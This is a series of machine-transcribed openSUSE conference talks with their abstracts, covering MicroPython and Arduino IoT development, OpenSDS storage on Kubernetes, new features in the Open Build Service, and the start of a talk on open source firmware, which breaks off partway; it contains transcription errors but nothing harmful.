put Python on these devices and you can have still room to write a Python program. And what this MicroPyton provides is, of course, no graphical user interface or something like that. But the things you need to program an IoT device. So you can do analog and digital IO. You can do computations on these. It has various buses to talk to external devices. And of course, it has TCP IP and an HTTP stack. So your IoT device can provide a web server endpoint and you can connect with your mobile phone or something like that with a browser to this device and read out your temperature or the gas sensor. So for example, at the maker space, so FabLab in Nuremberg, there's a gas sensor for carbon dioxide. And based on this, there's another calculation how many people are in the room currently, which is pretty nice. There is also another project on the internet which does something similar, which scans mobile wireless devices with such a small thing. And based on this, estimates the number of people in the room. And example for MicroPyton is this. So MicroPyton even has a help command. And then you can scan the network. And at this point, I'd actually like to demo it. So what I have here is a device like this, which is the same like this one. It just has more IOPINs to connect to. 
And it's a bit easier because it has, I can connect a USB cable. So let's do the real thing. So here's the Python prompt. I can enter help. I hope this is readable for all of you. And here it even says how to connect to it. So I can just now copy and paste from here. Import network. Then I create a network interface and activate it. And then I can scan. Takes a while. And here it gives you a typical Python list. Let's put it a bit more up. This is a simple program. So if you check on your mobile phones, this is the actual endpoints that are available in this room. So this is the name of the endpoint. And this is the MAC address and a couple of more parameters like signal strength and so on. I see at least two who don't believe me and check. All right. So back to the presentation. Oops. That was MicroPython. Then there are a couple of other firmwares you can put on. For example, there is Esprino, giving you JavaScript environment. And there is basic and more. So if you Google for this, this is really amazing how much possibilities you have nowadays to program and interact with these devices. Firmware update is also relatively simple. So either you have a device like this where you directly connect USB or you get one of these USB to serial converters and a couple of cables. You just now need to connect the right pins to put this device into programming mode. And then again, open it to the rescue. There is Python ESP tool and the correct firmware binary. You can flash your own firmware. But no Linux. There is a couple of tools, but no Linux and Wolf. So where is Linux and where is openSuser L? All these devices need to talk to some endpoint and there Linux is everywhere. It is that Linux that holds the Internet together that provides database that runs on gateways and so on. That gives you a workstation or a laptop to program these devices. Also you do your software development usually on Linux. Then you do cross compilation. You do debugging on Linux and you have your terminal like Minicom. About cross compilation, you cannot directly run Linux or your compiler on these devices. So what is cross compilation? Cross compilation means that it is not your usual software development workflow. Your usual workflow is you are sitting on the device and you edit your compiler link run in the environment your final program runs. You don't have a change of platform. Cross compilation means that you are developing in a different platform than the final program. So you need to compile for a different device, you need to link for a different device and at the end of the link you need to upload it and then you can run it on the final device. And here openSuser has a huge set of cross toolchain tools. So for example there is a cross DCC, that means a normal GNU C compiler but it outputs code for example for one of these devices. And in order to do this you need cross headers, cross in clut files. You need the complete bin utils chain like the assembler and the linker and of course in order to link you also need cross libraries. And all this is available on Devil GCC in the build service. Here our GCC maintainer are doing an awesome job of keeping all these cross targets alive. So you get the latest and greatest GNU compiler, the complete toolchain able to cross compile for ARM, AVR is the typical device or Arduino, you can cross compile for power CPUs or risk of a five MIPS. For example MIPS is a typical CPU in a small wireless router so again kudos to the GCC maintainers at this point. 
Then in order to develop there is a very nice IDE and that is called Arduino. So who has not heard about Arduino yet? Good. Thankfully everyone has. So typical Arduino device would be this one, this for example has an AVR processor and also lots of IO but no wireless and newer devices of Arduino look more like this. They have meanwhile an ARM core, here they have a newer Wi-Fi module and this little thing here, this ugly shaped or U shaped metal plate is the actual antenna for Wi-Fi. And with the Arduino IDE you can directly write your programs either in C-like language that is called processing or directly in C or C++. Arduino IDE is an integrated development environment, it's a Java and it has some Go tooling and there you have everything, you have a nice editor, then it calls Arduino builder to call GCC and the linker and it supports a myriad of hardware devices. How does it look like? So it typically looks like this. So this is the editor window, you have a check mark button here, this is the compile button and then this little error right next to it, this means upload, so you can then upload your compiled program. And here coding is normal C program. What is extremely nice about the Arduino IDE is that it's easily extensible to other devices. So just for reference in the presentation, for example in the main settings you can enter URLs of additional board managers so that it knows about new hardware, new devices, new CPUs. So every device nowadays has such an extension so every time you grab a device you can add this here and it's supported. A quick look at what this means if you download or add such a device, so for example ESP8266 so the one here is called extensa CPU and when you add this you get a lot of additional binaries and they all sound familiar. So you have the GCC compiler here, the archiver, RunLip, GDB, LD, Linker, G++, the complete GNU tool chain. What is really amazing is the set of libraries, predefined libraries in Arduino. You have libraries for sensors, you have libraries for complete application web servers, you have libraries for this displays for LED stripes. Here just to pick an example is a can, a solar can is a typical industrial bus to connect such devices. You can also update your libraries in this IDE. It's extremely well integrated and of course you have a boards manager and here is just a typical list of boards and even if your board is not supported you can adapt everything. Arduino IDE is of course packaged in openSuser, it's not part of the LEAP distribution but we have cross-toolchain AVR because AVR is the CPU where Arduino started with on built openSuser.org. The package for historical reasons is sped with an uppercase R but the command is with a lower case. I adapted it in a way that if you download Arduino from the internet you get the complete GNU tool chain based on GCC6 or 7. I adapted it in a way that first of course this IDE is compiled from source so it's not a repackaged binary and I stripped all the Arduino provided GNU tool chain and this uses the cross-toolchain from GCC. I'm already at the end of the talk. So let's look at IoT programming with openSuser. It is extremely simple and extremely cheap for everyone to start with it. You have many, many sensors and IoT is all about sensors. You can choose the programming language that you are most familiar with and openSuser everything is packaged and ready to use. And with that I'm at the end. Thank you. Questions please. And we have a microphone. I will leave those ESP32 chips. 
They have extensa CPUs and we currently don't have extensa cross-compilers. So I have to use the binary blobs that are provided for the Arduino IDE. That's probably just approaching the GCC maintainers and enabling this in GCC. I was just pulling for the status. How far are we into this? I haven't looked at this. Okay. Thank you. Because I mean these devices I don't directly code in GCC. I usually use micro-pytons or JavaScript. Okay. I see. Of course if you want to, for example, compile micro-pytons from source then you would need it. More questions? No. Okay. From the front. From the micro-pytons, how do you upload the application? If you write a script or so? Yeah. You need to write a script and then wire a serial device. You can also enter it manually and then store it on the device. I mean they all have flash memory. So you can basically use this reduced plain Python and program it like on a normal Linux system. Yeah. Can some of the devices be updated over the air? Actually all of these devices can be updated over the air if you program it. So for example a German tool shop called OB provided a wireless power plug which you can, where you can wireless can turn power on and off. It costs 10 euros. It has an ESP8266. You can reflash it with open source application. This open source application then gives you a simple web endpoint so you can connect to it with your browser. You can add sensors to it and it has the capability to download newer versions from the internet. Nice. Okay. No more questions. So if somebody wants to have a look I have some stuff here in front so that you can see how small these things are. Otherwise thanks a lot and enjoy your day.
Small networked devices, commonly named Internet of Things (IoT), lead the next revolution in information technology. This talk will present the software and tools available on openSUSE to participate in this revolution. We will especially look at the 'Arduino' IDE to program Arduino, ESP8266, Wemos, ESP32, and similar devices.
10.5446/54411 (DOI)
Okay, now I'll start. Okay, this time I will speak this content. Richard and Takeyama, thank you for mentioning my talk. Sorry. Hello, nice to meet you. I am Shuta Hashimoto. I am a member of OpenSuze Japan user group. My work in the group is managing events, introducing OpenSuze at conference. I introduce portraits and cubic. And most important, my work is two light geek magazine articles. I usually use this icon, Twitter and Facebook and OSEM. Regards. Okay, part is OpenSZS. OpenSZS is abstraction layer of storage. Two designs used by many systems and use many storages. Their goal is open autonomous data platform. Inside, using OpenSZS, there are container systems like Kubernetes, Docker, virtualization systems like OpenStack, VMware, and other like CloudFundly. This is upper side in slide. Inside, used by OpenSZS, there are two categories. First is storage. This includes LVM, self, sender, and more. This is on the left side in slide. Second is multi-cloud. This includes Amazon S3, Azure Storage, and more. Upper side systems use transparent storage and multi-cloud storages. Oh, by the way, what is software defined storage? Usually, when we use storage by the system, system administrator set up all things. Sometimes system administrator same as system operator or developer. He should have many skills and many jobs. He creates volume and attach it to system and adjust total storages. SDS do it automatically. System operator order volume. So, system request that to SDS system and SDS system do it, creates volume and attach it. This case only includes create and attach, but SDS can do detach, delete, replication, backup, and more. In this workflow, there is one important point. That is how request. If administrator set up volumes, he can adjust set up each steps. About SDS, system should request definition and SDS system should publish API for that definition. This model is like infrastructure as code. It is storage as code if I say. Of course, code is written by not only administrator, but also system itself. Okay, I return talk to open SDS. It became to this outline when I map SDS model to open SDS. Open SDS has not bound plugin project. This provides how system join open SDS. SDS provides CSI and service catalog for Kubernetes. Sins are compatible API for OpenStack. This is outside of SDS. Open SDS has command line interface and dashboard. Dashboard is web interface. You can log in and manage OpenSDS from dashboard. How about lower side? OpenSDS only defines and implements API. OpenSDS has many drivers that join API to physical things. For example, LVM driver creates logical volume from volume group. This case, administrator only set up volume group. DRBD driver creates host best replication between two hosts. If you want to append new strategy solution, only you should write driver, but maybe that is a slightly hard work. OpenSDS have only server program. To use it, only learn it. OpenSDS have driver control program named doc. Doc manage storage drivers and controller manage doc. One case, cubic use, save through CSI. Another case, openSDS use AWS S3 object. Unfortunately, there is no northbound plugin for OpenSDS, but OpenSDS has command line interface, dashboard, and client program. We can write share script or client program. Honest story I say, many storage has manager or is manager. For example, DRBD has linker, and OpenStack can manage volumes itself. And before session talks, look is also. About this point, OpenSDS has no advantage. 
Lister can manage DRBD more effectively than OpenSDS. The one of OpenSDS advantage is to manage multiple strategies and use by multiple systems. OpenSDS has design outline on their GitHub. Please see that to know details. Let's see functions. About storage, OpenSDS can create volumes, attach volumes, snapshot, replication, and delete. About multi-clouds, use bucket, and migration. Each functions only do one thing. That is small power. But OpenSDS has autonomous data platform. That means each functions could create each other. I tell one scenario, system request volume. OpenSDS create volume and replicate. Every day, get snapshot. And after months, system does not need data. OpenSDS move data to call the tape, sorry, call storage like tape. Not tape.js has not implemented yet. About multi-clouds, OpenSDS implements migration. You can migrate data from AWS S3 to Azure Storage. About OpenSDS, developing is going on. Start is that, they run. So A, Ava, B, Bari, O, Bari is host of OpenSDS Azure Summit this year. And C, Capri is now developing. Capri feature being managed to master of OpenSDS GitHub. There are many notable features, especially data lifecycle. Data lifecycle manage object lifecycle. To define town, AWS S3 objects migrate to Azure Storage after that time. And finally, delete it. If data have lifecycle like log, you can map it to storage. This is the future of OpenSDS. Many companies joined OpenSDS as user and established user group name and user advisory committee. They do not advice user, they advice developer. They request their want and need. How's meeting by week? This project grow depend on user demand same as other OpenSDS projects. OK, changing the topic. I talk container volume strategy, first I talk about Docker. This picture is draw container recreate. You know container is virtualization system. Container contains all things. But that means container also has data. Container has one advantage that is you can recreate container from image anytime. Recreated container is same as before because it created from same image. Image don't has data. So container also don't has data. We resolve this to write data outside of container. One is mount host pass. Or two is use data volume container. Data volume container is container so it has same theme. Usually we plan back up to safety place. When we design container storage strategy about Docker and Kubernetes, most important thing is to determine which data need to be outside of container. In other words, which data need to be persistent. It is necessary to know container structure so that we know it. Which data does not change from image? Which data changes from image in operation? Which data changes from image is close of which data needs persistent? And if we can, we should express which data is changing in operation and we create container images. Okay, cubic and volume. About cubic, port runs independent north. So port cannot use north except different north affinity. Upper side of this slide is independent north. For lower side of this slide is dependent physical like north. So to join port to volume, volume should be network volume. This item in slide express Kubernetes resources except storage most lower item and admin which is human. To use this mechanism, port should have persistent volume claim name to use and mount point in port. Persistent volume claim define what want. For example, volume type, capacity and access mode. Type is storage class which is second from bottom resources. 
Persistent volume is express volume to use. This define type, capacity and access mode. Which is same as persistent volume claim. Further, storage data like API IP. Last is storage class. This is category of storage. Category is defined by admin's data arbitrarily, not storage demands. For example, high speed and low speed. To save policy, this definition is called profile. Some storage systems includes open SDS. Kubernetes has two way to provision volume. One is left side. This is handmade by admin's data. Admin's data like YAML for persistent volume. Kubernetes attach persistent volume to persistent volume claim automatically. Kubernetes finds, satisfying and demand persistent volume. Define of data, sorry, define of storage data like API IP in persistent volume is used by this case. Two is left side. This is dynamic provisioning. To create persistent volume claim, persistent volume is created by Kubernetes automatically. This model like software define storage. To use this, we need to define provisioner in storage class. Provisioner create persistent volume and attach automatically. Kubernetes has many provisioner of major storage like ZCE persistent disk, SINDA. Further, Kubernetes supports CSI, which is common storage interface. CSI can append other storage provisioner and can use same way in this dynamic provisioning. I say simply, CSI need to run node plug-in pod and controller plug-in pod, two pods. So to define provisioner in storage class, we can use this append provisioner. The one way, one of way that open as the support Kubernetes is CSI. This is release and recommender data. Now, this is the only way to open as the as used by Kubernetes, by cubic. OK. I tell feature features. This is the alpha features Kubernetes implements service catalog, which is implementation of mechanism to use open service broker. Open service broker is API of service broker. So what is service broker? Service broker is solution of cloud foundry to use other managed service. Service broker join cloud foundry to other managed service like RDS. Developer implements open service broker as cluster service broker. Service catalog in Kubernetes use cluster service broker. Cluster service broker mediate between Kubernetes and managed services. I tell workflow to use service catalog. First, first, add on the letter get list from cluster service broker. Cluster service broker shows list of service from managed service. This list represent in Kubernetes as cluster service class and cluster service plan. Cluster service class is type of service like volume. Cluster service plan is plan of service like free tier or paid tier. This time, there is no instance anywhere. Only get list. Second, use managed service for pod. This step has two Kubernetes resources. One is service instance. This is represent service. Two is service binding. This is represent bindings of pod and service instances. Add on the letter select cluster service class and cluster service plan for pod. And create service instance define the touch plans. This step creates managed service instance. So add on the letter creates service binding for pod. This step create secrets includes binding information. Secret is one of resources, one of Kubernetes resources. This define subject is different each managed services. Last, add on the letter creates pod define secrets service binding made. In this model, add on the letter create service instance and service binding. And add on the letter tell operator service binding information to need pod. 
Operator creates pod with reference to the information. I tell this in talk of cubic and open sds, but workflow is same as the managed service. So open sds developed service broker. Now this is alpha. Outline is same as other service brokers I explained. Managed service is open sds and cluster service broker developed open sds measured between cubic and open sds. Service class that cluster service broker show is volume service. Yes, open sds is solution of volume. Service plan that cluster service broker show is the path, replication and more. Administrator creates service instance with to set service class and service plan. And creates service binding with to set service instance. Service binding creates secret includes binding information which includes volume ID. Now I talk about one new feature of Kubernetes that named pod preset. This is also alpha. This is injection additional runtime requirements into a pod at creation time. Pod preset define injection data. And pod create pod injected that data. Levels select are measured between pod preset and pod. This case pod preset define volume and volume amounts. And define match levels. Operator only creates pod include level match the match levels in pod preset. Pod preset needs volume ID that define service binding. And use flex volume plug in to join volume. To use flex volume is a bad idea many people think. So this should be changed. This model administrator creates service instance, service binding and pod preset. And tell operator level name which is match pod preset. Operator only define level name that tells by administrator. Cluster service broker open sds developed will improve. So cubic can use open sds effectively through service binding. And finally I speak packaging status. Unfortunately all distribution do not remark open sds. But yesterday open sds member told me that third is ready. But this is only for open suzer not cubic not micro os. Other way we have to compare to use open sds in open suzer. In fact open sds is new solution unstable and too complex. But open sds has potential. I think there is a way to package it. I want somebody to package it. Or if nobody it maybe I will try to package it. Please help me if I do. There is one notable point. Open sds tutorial wiki has take us that we recommend use open to strongly. I tell them that I do that tutorial as open suzer. They rejoice that I want to modify that take us to open and open suzer strongly. I will express experience to use open sds. Please remark it and use open sds with cubic. Thank you. That's all my presentation. I have Q&A time but sorry I am not good at English. Please ask slowly. Any questions? Okay. I finish my talk. Thank you. Thank you.
I introduce OpenSDS that is an open source community working to address storage integration challenges. I remark technology. OpenSDS can manage LVM, Ceph, Cinder, and more as a software defined storage. and We can use OpenSDS in Kubernetes through CSI, Flexvolume, and Service Catalog. therefore, Kubernetes can use software defined storage by OpenSDS. I draw overview of Kubernetes - OpenSDS - storage relationship and explain one case of to build on Kubic. This strategy bring us these benefits: - If Administrator create PodPreset at SDS, Application developer don't need to prepare storage. - If Administrator create storage pool, He don't need to create volume each request. And I explain potential of replication with DRBD. Participant can learn SDS strategy on Kubernetes with OpenSDS. and How to build on Kubic.
10.5446/54413 (DOI)
Well, we can start. Hello, thank you for coming to this talk about OBS, Open Build Service. First of all, let me introduce you to the people who are going to talk to you today. My name is Sarai. I am a web developer in OBS. David is also a web developer. Frank works in the backend. And Marco is in charge of OAC, our command line client. Some of our colleagues really believe that we work like this. We live in the Canary Islands in Spain, and they think we are all day long lying on the beach. I'm bathing with our laptop, but it's not like this at all. We work in a normal office. We share it with all the Canary guys, and it is quite normal, as you see, full of chameleons, of course. And this is the agenda for today. We are going to talk about what is new in OBS. David and I are going to talk about the web application. Then Frank is going to explain us what's new in the backend. And finally, Marco is going to tell us the news about the command line client. Well, sometimes we develop some features that are so big or so complex that we need exhaustive testing for them. So we need some users to test them, but they are not in a final version. So how can we do that? We have for that the beta program, where we don't show those features to all the users, but only to those users who want to join the beta program and test what's new, all the features that are ongoing development. It's very easy to join. Any of you can join right now if you want. You can just have to log in in OBS, go to the profile page, to your user page, and then on the left side, you have a link to join the beta program. From that moment, you can see all the new features that we are delivering, and you can start working with them in your daily work. And it's going to be very useful for us because maybe you can find some bugs or you can realize that some workflow has changed and it's not good for you. So please join the beta program. It's very easy. And every time we deliver some new features, we are going to announce them in our blog. Have a look to it every two weeks or every month. Usually you will see something new there, and it's very important for us that you test them and open an issue if you find something strange. If you join the beta program right now, you can see that we have a refreshed user interface. You can see that most of the pages have looked a different way. And why do we re-bump the user interface? We have many reasons for that, and the most important one is that the technology we were using is now obsolete, and it is not longer maintained. So for this reason, we are re-bumping it. We have to choose a new technology, but there are more reasons. Another one is that we want our user interface to be mobile-friendly. We also thought that it was time to make it more modern and a bit nicer. It's also useful for us to rewrite the code a bit because it was a bit chaotic sometimes, and we need them to be tidy and clean to be able to refactor it in the future or maybe changing the workflow, and it's easier if we have everything tidy and clean. Well, we did some proof of concepts with some workflows, some frameworks, sorry. We tried semantic UI. We also tried Bootstrap and Bulma. And finally, we realized that the best for us was Bootstrap. The reasons are, first of all, there is a big community behind Bootstrap. It is a stable project. It's reliable. It's well-documented. It has all the features we needed. Some of our colleagues had experience with it, so we choose it. 
I'm going to show you some of the pages that has changed. This is the old main page, the home page of OBS. And now you can see how cool is it nowadays. A lot of change, right? Amazing. Don't you think so? I don't think so. Yes, it has changed a bit. We have new icons. The layout is wider. We have more empty space between the elements, but it's not really a big change, as you can see. That is what we wanted to achieve. We didn't want to disrupt your daily work. We just wanted to keep it like it was, but it has changed a lot behind. The code has changed a lot. We have migrated a lot of things. For us, we are getting what we wanted. This is another example. This is the page of the project. It looked like this before, and now it looks like this. Yes, a bit better. Not bad. Most of the pages are migrated like this, keeping what we had before, but making it more clean. And now I'm going to show you some of the pages that really changed, because we thought it was necessary or it was a bit confusing before. The repository page is one good example. It was like this. We had some list of all the repository names. A bit more information. But now we are displaying this in boxes. We are using all the free space on the right, so it looks better now. This is another good example. This is the pulse page. This is, it was a list also, and now it looks like this. It's colorful. All the information is divided into sections. We also can select for periods of times there, so it has improved a lot. Also, we did some good job, I think, with the group members tab before it was a table for only one column or two, if you are admin. And now we can see all the users like this. We focus on the avatar and the name, and they are side by side to use better the space. We did it. We have our application, and now it's mobile friendly. It looks very well in the mobile. You can see everything I have just shown you if you joined the beta program. So please join. Please give us feedback. Please let us know if you have found something wrong or you suggest any change. That's all from my side. David, I'm going to tell you more interesting things about OBS. Thank you. Thank you, Serai. I look like a singer with that. Okay. So now we have the Statute Report API. I mean, in the last few years, we were trying to do some changes. We were trying to improve our continuous integration. And we know that when we can provide more information, you can take better decisions for stuff that you can do in your workflow. So let's explain a little bit what is a continuous integration. So imagine like in GitHub, your source code is you have a pull request, so it's trying to build. We pass it to some testers, and after that, the tests are reported. So you have some report, and everything is green. Everything is fine. So it's merged to your source code, and you can release it. What we have done with the Statute Report API is an API that you can take this information from the external tool and show it in OBS. That means that when your, for example, Travis tells your testers green, in OBS you can show this information. You can see it in the checks that is below, that we have some test with OpenQA, that is a Xeed, another one with a Minimum that is pending because it's not finished, and one that is failed. And with this Statute Report API, we empowered our staging workflow. Our staging workflow is some kind of CI, because with that, we can take a bunch of summary requests and test all together. 
So for example, here, we can see that we can take a lot of packages, a lot of summary requests that you want to integrate in your project. You add it in a staging project that then they start to build, and it is in an external CI. With the Statute Report API, you can check if the external have done or finished it, and have finished it, sorry, I forgot this slide, if it has finished it and reported, and if it's green, you can merge it, and you can release it. So here we have an example, so here you can see the staging workflow. In this case, for the project test Linux. And I think it looks like it's very useful. So with that, you can see that the good point of the staging workflow is that you can take different summits requests that are really different from different projects, and you can test all of them together, not like the other CI that you can only test independently by Y1. So now let's speak a little bit about the future. So right now what we have is that when some changes occur in our repository, that is the case of GitHub, someone contributes, make a pull request, this pull request is merged, GitHub sent to us a request, and then we start to do stuff. For example, updating the source, start rebuilding. But what we cannot do and we want is when something happens in OBS, we should also be possible to send an event or send a request to another standard tool. For example, in the case of OpenQA, so we want an event to happen in OBS, we can tell to OpenQA, okay, now you can test. OpenQA is an automatic tool for OpenSystem. That could be OpenQA, that could be also Travis, any other kind of tool that we want to do. So with this concept, we try to improve the communication with the tools directly. We don't need to any intermediate or any kind of bots or any kind of ground that do stuff in the middle. So we want to connect and talk with the external tools directly. What another improve that we want to do is automate interface updates in real time. What that means? That means that you don't need to do any more F5, F5 to get information. So let's have an example. So here you can see that your user is interactive within the face and he talked with the backend, and the backend gave him the answer. So if you want to get an update information, you need to refresh again the page or do another action to get the feedback. And in a real example, here you can see the result, that is the back edge per city that is still building from some repository. And if the user wants to know that the build has finished, you need to click on the refresh icon that is on the top. And sometimes nothing changes because the backend is still building. You don't have any information. So what we plan to do really is when the backend has something to update, the interface should show the update information. That means that this build is taken in the bottom, should automatically change to succeed if the build was succeed without any interaction from the user. So now without any interaction. Besides rebuilding, as we are responsible for the instance, build opensusr.org. And we are many, we are many, many admin tasks like deployment, debugging, issues looking into the logs, monitoring to different dashboards. And we want to avoid this kind of task and doing things more automated. And automated, sorry, and connect system via software. And then we do the deployment as we are many people doing that and we expect in the future that more people will do the same. 
We need to have some kind of, we need to start managing the deployment. So we would like to know the current deployment. We would also like to set the deployment in a specific time or even know what's happening in the past, I mean the history of the deployment. Another aspect is we also try or maybe think going to the direction to the continuous deployment. That means when a change happens, deploy with automatically get a deploy. And that will provide to us more time to be able to focus in more important tasks. For having a clear vision of what's happening in the build. I mean the distance that we are in charge right now. We have to increase the monitoring for the application health, for application health. I mean, for example, for example, to look performances or to see what's happening there or what's happening with our system. And we also want to be alerted, I mean to get some notification when something critical happens to be able to fix it as fast as possible and give you a better service. So for example, right now, we have performance monitoring for that. We also have tracking, a track reception. But they are all disconnected. I mean, they sent to us the same, their own notification. And for us, it's a little, sometimes very hard to have an overview of the state of what is happening in all the place. Maybe the system is down, maybe the user makes something wrong. Something happened for us is very difficult to track all this information. So what we want to do is to work, what we want to work is to connect all these tools. Because like a C4, when something wrong happens, like for example, the service down, we want to know what's happened and we want to do it, to know it the easiest way to check what is happening. Sorry. And also to be sure that we, and having this information, we will be, we can fix the problem as fast as possible and give you a better service and bring back the service to its normal state. So in summary, what we want is to have an automated, connected and observable system. And that's all for my part, from my side. So Frank. Thanks, David. From the backend side, it was really hard for me to find something that might be interesting for the users because we did many improvements for the speed of the backend. But mostly, most users don't see the things we are doing there. So I will concentrate here on the constrainers stuff. We did it in the last year. We replaced Scopeo as a tool for our container uploads to a registry. We implemented container unpacking and layer layering on the server side and implemented the whole registry protocol. So OBS now can run as a Docker registry natively and a notary. So this is especially interesting when you run your own instance because it saves a lot of disk space. By this, I don't know who has already used registry openSusieWalk. We now enhanced the information which registry gives in the web front end, especially here. You can see that you have a link to your building project where the container is built. And now you also can choose your tool of choice for using the Docker containers. And that's from my side. And now I hand over to Marco. Hello, my name is Marco. Most of you might know me from sitting behind those video tables. But beside of that, I'm the OSC maintainer and OSC developer. And I make it really short because there is no big news. We are on the current version is 165.1. There was six releases since last year. Since I gave the almost same talk in Prague. 
We have 146 commits since then, which most of them are just small stuff, but nevertheless, 146 commits. And there were two big changes. One is the URL grabber is no longer needed. So we are not dependent on him anymore. And the reason why we are not dependent on him anymore is we are pie cents three compatible since the latest version. Yay. It took a long time, but at least we made it. So I have a lot of free time. No, not really. Because the next things we will completely rewrite the password handling because it's a pain in the ass. It's not good because if you ever have tried using key ring, I don't know, have anyone is using key ring with. Yeah. Yeah, it's possible, but it's not user friendly. Let's say that way. So this will be better than the complete setup process. So the first time you start always he will be improved so that you get like you have the choice should, should the password be stored at all? Should it be stored in the key ring? Something like that. Then the documentation as always needs to be improved. If anyone is interested in writing documentation, please come to cool. I will come to you. And what I realized while migrating to Python 3 is that the test coverage in Python and in OEC is not very good. We test the base library with where we mock the back end calls, which is what, which was nice because I used this pie two, two, three script, run it over OEC, let the test read run, everything works. I was very cool. I'm done. Five minutes. What's your problem? But then I started using it and everything broke. So we need better test coverage. We need better way to test like a complete CLI test, not only mocking the back end, but more like testing again against a real back end. And of course, there will be a lot of Python 3 bug fixes coming. So you will see a lot of releases like one, six, five, dot one, dot two, dot three, dot four, you name it, until the Python 3 branch is completely stable. So if any one of you is, please use the Python 3 branch, I am open to bug reports. I'm happy to receive bugs because the more bugs I get, the more I can fix and the more stable the Python 3 branch gets. So that was from my side. So questions, I think this is not just for me, this is for everyone. So if, yeah, if someone who is responsible for this talk. I'll save you. Okay. Any questions? No. Thank you very much. So before we leave, please. I forgot one slide in this talk. Wait, wait, wait, wait. And try to, okay. Don't forget, please, join the beta program, try buildup.org and create users. And also, review our blog for the formal news. Thank you very much. Thank you.
OBS Team will briefly explain the evolution of the OBS in the last year, and also some of the impressive features that have been included recently. We will introduce the advances of OBS, not only the Frontend but also those related with the Backend and OSC (command line tool). We will also give some hints about the upcoming features we have in mind for the future of OBS. Sounds interesting, right? Don't miss this talk and take advantage of knowing all the improvements that can make your work easier using OBS.
10.5446/54414 (DOI)
Hello everyone. I'm Daniel. Today we'll be speaking about open source firmware. First a small introduction starting with me because not everybody necessarily knows me and I'm strolling around everywhere. So yeah, this is me. I'm Daniel. I'm actually a web developer. So people might ask themselves why am I here at OpenSUSE conference because we're talking about operating systems. We're talking about software at large. Our platform is a distribution mostly. So and I'm not even going to talk about web stuff anyway. I also have a security background in fact. Okay, so I look at all the things out there. I don't just look at the very high level where I'm necessarily working, but also look at very, very low level sometimes. And that's what brought me here. I'm also a member of a hacker space in Bochum, Das Laboie, that I down there. That's our logo and other tutorials. But first I want to thank you. And by you I mean especially OpenSUSE, the project and the community. You all know this friend here on the left. If you don't know the one on the right, this is Oscar. And Oscar is the mascot of the OpenSUSE firmware conference. Last year we had the very first ever OpenSUSE firmware conference not far away from here actually in Erlangen. And among some large sponsors, we had like ARM and Intel was there. We also had OpenSUSE. And that was a very, very nice surprise for me. I didn't really expect this. So yeah, thanks again. We had 200 participants from all over the world from many different ages, from different vendors, companies. We had students. We had hobbyists. Literally everyone. And also people from different backgrounds. Okay, so not just people working directly on firmware, but we also have people who are even closer to hardware, people who are more in the field of security. And that's why we had two full days of talks and two tracks even. One of them covering the entire security topic. And if you've been following the news a bit, you might see that suddenly we need to look a bit more at security also in the fields of firmware, but more on that later. In addition, we also had two days full of workshops. So we also had a lot of sharing going on. Okay, and that's what we want to spike now. Because, I mean, we all know about OpenSource, but we feel like there should also be more in the field of firmware development. So speaking about which, what is firmware anyway? Okay, so firmware is literally everywhere. The picture here on the left, I took that from one of the printers in our office once, because it was just updating its firmware. It happens sometimes. So you need to tell people, oh, you can't print right now. It's running a firmware update. And now people suddenly get aware of, well, things actually running on those devices. Almost everyone has watched now like this, or not necessarily everyone, but many people, which is also running some sort of firmware. So those are those very small devices where you usually have one system on chip. And, well, they are kind of ubiquitous now. On the other hand, we all know laptops, like this one here. This here is an actual photograph of another laptop of mine. And here we actually see those settings we can do in the firmware. And in laptops, we typically have more than just one chip. We have lots of chips, and they all need some sort of firmware. So you all know BIOS, the legacy basic input output system. You heard about UEFI. So that's what many modern platforms are now running. That's what's on the host CPU. 
But you also have the ME, the Intel Management Engine, which is a tiny co-processor somewhere on your mainboard, found mostly on Intel devices, of course. Then you have a gigabit ethernet interface, which in many cases also requires additional firmware; without that firmware, things may not even function properly. There is an embedded controller somewhere in your laptop which is nowadays responsible, for example, for powering the fan: it measures and checks the temperature, and if the machine is running too hot it turns the fan on and makes it go faster. If that doesn't work, well, your laptop won't survive too long. Which brings us to vendors. Vendors are already providing us with firmware, right? When we buy a laptop, we know there is already something on there. Even if there is no operating system installed, we still have firmware, so we can boot one of our systems, install it, and happily run it. And we can even upgrade it. There is the Linux Vendor Firmware Service, a project that is quite a few years old now but still getting more and more traction, where vendors can upload their firmware, so that people running all those diverse distros, and we have so many of them, can use one single tool to upgrade the firmware regardless of the distro. There are more than 100 vendors on the list on that platform now. Not all of them are supplying updates there yet, but the platform is growing, and more and more vendors are doing something. So we're actually done, right? We don't really need to do much more in the field of firmware. Well, let's check, because there are actually some issues. The first one is continuous updates. I don't know about you, but when I as an end user buy a laptop and check the vendor site for updates, I can usually count two or maybe three updates over the entire lifetime of the device, which is not very much. We already had a very similar issue with phones. You remember those devices which ran an ancient version of Android for I don't know how many years, which is not just a problem for consumers in the end, but also for the entire ecosystem. In my company we also have developers on mobile platforms. The iOS developers are always happy because Apple keeps shipping updates, while the Android developers always have to check which old versions they still have to support and how many people are still using them. We don't want to repeat that problem everywhere. So since we currently depend on the vendors, maybe we need to do something ourselves. And we don't just rely on the vendors themselves, we also rely on their quality. I just had a chat outside with someone telling me that they bought an NVMe drive which had a firmware issue for about nine months until they got an update. So imagine you buy a device and you can't use it properly for the better part of a year, because your vendor doesn't provide firmware that actually works for it. And since we have so many components now, there is so much more to check for everything to work together. You can see one link here; I will publish these slides later so you can follow all those links, and I promise you there are many more things to look into. Okay, let's look a bit closer at vendors and supply chains. You are this person down there on the right: the end customer who is now buying some device.
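As a small illustration of the "one single tool" idea behind the LVFS mentioned above, here is a minimal sketch, not from the talk, that drives the fwupd command-line client from a script. It assumes fwupd is installed and that running it non-interactively is acceptable on the machine in question.

```python
# Minimal sketch: check for and apply LVFS firmware updates by driving the
# fwupd command-line client. Assumes fwupd is installed; applying updates
# normally requires root and may schedule a reboot into the flashing step.
import subprocess

def run(cmd):
    print("+", " ".join(cmd))
    return subprocess.run(cmd, check=False)

def check_and_update(apply_updates=False):
    run(["fwupdmgr", "refresh"])                # fetch current metadata from the LVFS
    updates = run(["fwupdmgr", "get-updates"])  # list devices that have pending updates
    # Exit code conventions differ between fwupd versions; treat 0 as
    # "updates were listed" for the purpose of this sketch.
    if apply_updates and updates.returncode == 0:
        run(["fwupdmgr", "update"])             # download and apply/schedule the updates

if __name__ == "__main__":
    check_and_update(apply_updates=False)
```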
